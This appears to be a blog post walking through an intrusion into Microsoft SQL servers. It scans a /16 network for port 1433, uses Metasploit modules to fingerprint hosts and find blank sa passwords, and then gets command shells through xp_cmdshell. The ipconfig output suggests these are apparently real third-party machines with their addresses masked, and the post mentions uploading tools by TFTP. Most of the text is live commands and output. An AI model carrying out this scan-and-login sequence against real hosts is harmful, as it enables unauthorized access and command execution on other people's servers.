rule #2 dont have a null sa account, especially if you are violating rule #1...
let's see...
use unicornscan to search for open TCP port 1433
cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p
Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108
run those hosts that respond through the msf auxillary module mssql_ping to see if we can get any version information. I'll omit the ones that didnt respond.
cg@segfault:~/evil/msf3$ ./msfconsole
=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux
msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info
Name: MSSQL Ping Utility
Version: 4419
Provided by:
MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for information.
msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
Now, lets run them thru mssql_login to look for any that have null sa accounts.
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info
Name: MSSQL Login Utility
Version: 4749
Provided by:
MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for a null SA account.
msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed
then lets use sqlcmd to see if we can get a command shell on the box. sqlcmd uses the xp_cmdshell to execute commands.
cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C
sqlcmd> ipconfig
Configuratio de IP do Windows
Adaptador Ethernet Conexto local:
Estado da media . . . . . . . . . . . : media desconectada
Adaptador Ethernet Conexto de rede sem fio:
Estado da media . . . . . . . . . . . : media desconectada
Adaptador PPP POP:
Sufixo DNS especsfico de conexto. :
Endereo IP . . . . . . . . . . . . : A.B.X.28
Mascara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padro. . . . . . . . . . . : A.B.X.28
OR
cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C
sqlcmd> ipconfig
Configurato de IP do Windows
Adaptador Ethernet Local:
Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.5
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . :
Adaptador Ethernet remoto:
Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.6
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . : 192.168.2.1
TFTP was available on both boxes for some some old school YR 2000 tftp upload your tools fun.
Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions
sqlcmd.c: http://excluded.wgv.at/codedstuff.php
metasploit (like you need the link): http://framework.metasploit.com/
-CG
2 comments:
honey pots?
perhaps...
this day and age you can probably assume that if you got in with some old school exploit it is probably a honeypot.
Post a Comment